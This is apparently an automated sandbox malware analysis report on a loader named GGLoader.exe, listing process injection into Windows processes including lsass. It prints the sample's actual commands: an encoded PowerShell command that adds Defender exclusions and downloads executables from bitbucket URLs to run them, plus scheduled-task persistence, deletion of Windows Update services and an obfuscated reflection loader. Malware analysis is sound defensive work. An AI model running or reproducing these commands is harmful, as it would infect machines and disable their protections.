Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17AABF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1600D650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 23FD1160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 208F5FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2505E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C08C180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5FC570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 87C0000 value: 4D
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Thread register set: target process: 916 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 8168
Modifies the hosts file
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Memory written: C:\Windows\System32\dialer.exe base: 1002B9010 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 6DFA038010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 87C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17AABF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1600D650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 23FD1160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 208F5FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2505E560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C08C180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5FC570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAb Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacgb4acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajag4adqbzacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccatgbvacaavgbpahiadab1ageabaagae0ayqbjaggaaqbuagualwbtaguacgb2aguacgagagkacwagageababsag8adwblagqaiqagafqacgb5acaacgb1ag4abgbpag4azwagag8abgagageaiabkagkazgbmaguacgblag4adaagagqazqb2agkaywblaceajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajahcaawbracmapga7aciaowa8acmazqbmahiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbmahaazwajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbuahoaaaajad4aiaataeyabwbyagmazqagadwaiwbhaheazaajad4aowaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavaduaoqa0adaaagbnadkaoaazadqalwbnagyamwa0adqamwbmadmalwbyageadwavadaayqbkagyayqblagyanabmadganaa3ageamqa3aguayqa0aguanabmadyanqa2agqaywbkadganqbladcangayadkamwa3adgamablagqalwbeac4azqb4aguajwasacaapaajahaaagb4acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmadgbjahkaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaeqbjahkaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmazqbuahmazqbhaguadaauaguaeablaccakqapadwaiwbiagcaawajad4aowagacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaanaggadab0ahaacwa6ac8alwbiagkadabiahuaywbraguadaauag8acgbnac8acgblagmaaablageadabzag8acgbnac8acgblagmaaablageadabzagqaaqbyaguaywb0ac8acgbhahcalwawadaazqbiadiazaawagianaazadyanqa5adeazgbjaguamqaxaduamwbiageaywbhadcangayaduamaa5aguanwa2adiazgayagmazqa0ac8aqwbmafaalgblahgazqanacwaiaa8acmacwbiagqaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwboaheadqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbrahcacwajad4aiaataemaaabpagwazabqageadaboacaajwbmagkaywbdaggazqbjagsalgblahgazqanackakqa8acmaawbpahgaiwa+adsaiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavahiazqbjaggazqbhahqacwbvahiazwavahiazqbjaggazqbhahqacwbkagkacgblagmadaavahiayqb3ac8amaawaguaygayagqamabiadqamwa2aduaoqaxagyaywbladeamqa1admaygbhagmayqa3adyamga1adaaoqbladcangayagyamgbjaguanaavaeqazqb2ag0aaqbuac4azqb4aguajwasacaapaajagqadqbxacmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmaaaboahqaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmadqbzahiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmauwblag4azaauaguaeablaccakqapadwaiwboahcab
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>;
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe "function local:nglbonfbsunr{param([outputtype([type])][parameter(position=0)][type[]]$qtvyipwnfcficq,[parameter(position=1)][type]$hhlnovedyw)$dpttuehyisd=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+''+'e'+''+[char](103)+'a'+'t'+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+'em'+[char](111)+''+[char](114)+''+[char](121)+'m'+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype(''+[char](77)+'yd'+'e'+'l'+[char](101)+''+'g'+'at'+'e'+''+'t'+''+[char](121)+''+'p'+''+[char](101)+'',''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+[char](108)+'ic'+[char](44)+''+[char](83)+''+[char](101)+'ale'+[char](100)+''+[char](44)+''+[char](65)+''+'n'+''+[char](115)+'i'+'c'+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+'a'+''+[char](117)+''+[char](116)+'o'+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$dpttuehyisd.defineconstructor(''+[char](82)+''+'t'+''+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+'e,'+[char](72)+'ide'+'b